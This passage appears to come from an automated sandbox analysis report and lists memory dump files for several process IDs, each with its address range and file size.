            • memory/3044-70-0x0000000020FD0000-0x0000000020FE9000-memory.dmp

              Filesize

              100KB

            • memory/3044-66-0x0000000020FD0000-0x0000000020FE9000-memory.dmp

              Filesize

              100KB

            • memory/3044-45-0x0000000001E60000-0x0000000004729000-memory.dmp

              Filesize

              40.8MB

            • memory/3300-19-0x0000000005BB0000-0x0000000005C16000-memory.dmp

              Filesize

              408KB

            • memory/3300-36-0x00000000086A0000-0x0000000008C44000-memory.dmp

              Filesize

              5.6MB

            • memory/3300-31-0x00000000067B0000-0x00000000067FC000-memory.dmp

              Filesize

              304KB

            • memory/3300-32-0x0000000007A70000-0x00000000080EA000-memory.dmp

              Filesize

              6.5MB

            • memory/3300-33-0x0000000006730000-0x000000000674A000-memory.dmp

              Filesize

              104KB

            • memory/3300-34-0x00000000074C0000-0x0000000007556000-memory.dmp

              Filesize

              600KB

            • memory/3300-35-0x0000000007450000-0x0000000007472000-memory.dmp

              Filesize

              136KB

            • memory/3300-18-0x0000000005B40000-0x0000000005BA6000-memory.dmp

              Filesize

              408KB

            • memory/3300-29-0x0000000005C20000-0x0000000005F74000-memory.dmp

              Filesize

              3.3MB

            • memory/3300-38-0x0000000008C50000-0x000000000B519000-memory.dmp

              Filesize

              40.8MB

            • memory/3300-15-0x0000000004C90000-0x0000000004CC6000-memory.dmp

              Filesize

              216KB

            • memory/3300-16-0x0000000005300000-0x0000000005928000-memory.dmp

              Filesize

              6.2MB

            • memory/3300-17-0x00000000059A0000-0x00000000059C2000-memory.dmp

              Filesize

              136KB

            • memory/3300-30-0x0000000006220000-0x000000000623E000-memory.dmp

              Filesize

              120KB

            • memory/3488-0-0x00007FFE80CF3000-0x00007FFE80CF5000-memory.dmp

              Filesize

              8KB

            • memory/3488-48-0x00007FFE80CF0000-0x00007FFE817B1000-memory.dmp

              Filesize

              10.8MB

            • memory/3488-40-0x00007FFE80CF3000-0x00007FFE80CF5000-memory.dmp

              Filesize

              8KB

            • memory/3488-39-0x00007FFE80CF0000-0x00007FFE817B1000-memory.dmp

              Filesize

              10.8MB

            • memory/3488-12-0x00007FFE80CF0000-0x00007FFE817B1000-memory.dmp

              Filesize

              10.8MB

            • memory/3488-11-0x00007FFE80CF0000-0x00007FFE817B1000-memory.dmp

              Filesize

              10.8MB

            • memory/3488-1-0x0000021A4F9B0000-0x0000021A4F9D2000-memory.dmp

              Filesize

              136KB

            • memory/3692-61-0x0000000000400000-0x0000000000424000-memory.dmp

              Filesize

              144KB

            • memory/3692-59-0x0000000000400000-0x0000000000424000-memory.dmp

              Filesize

              144KB

            • memory/3692-58-0x0000000000400000-0x0000000000424000-memory.dmp

              Filesize

              144KB

            • memory/4532-53-0x0000000000400000-0x0000000000462000-memory.dmp

              Filesize

              392KB

            • memory/4532-57-0x0000000000400000-0x0000000000462000-memory.dmp

              Filesize

              392KB

            • memory/4532-55-0x0000000000400000-0x0000000000462000-memory.dmp

              Filesize

              392KB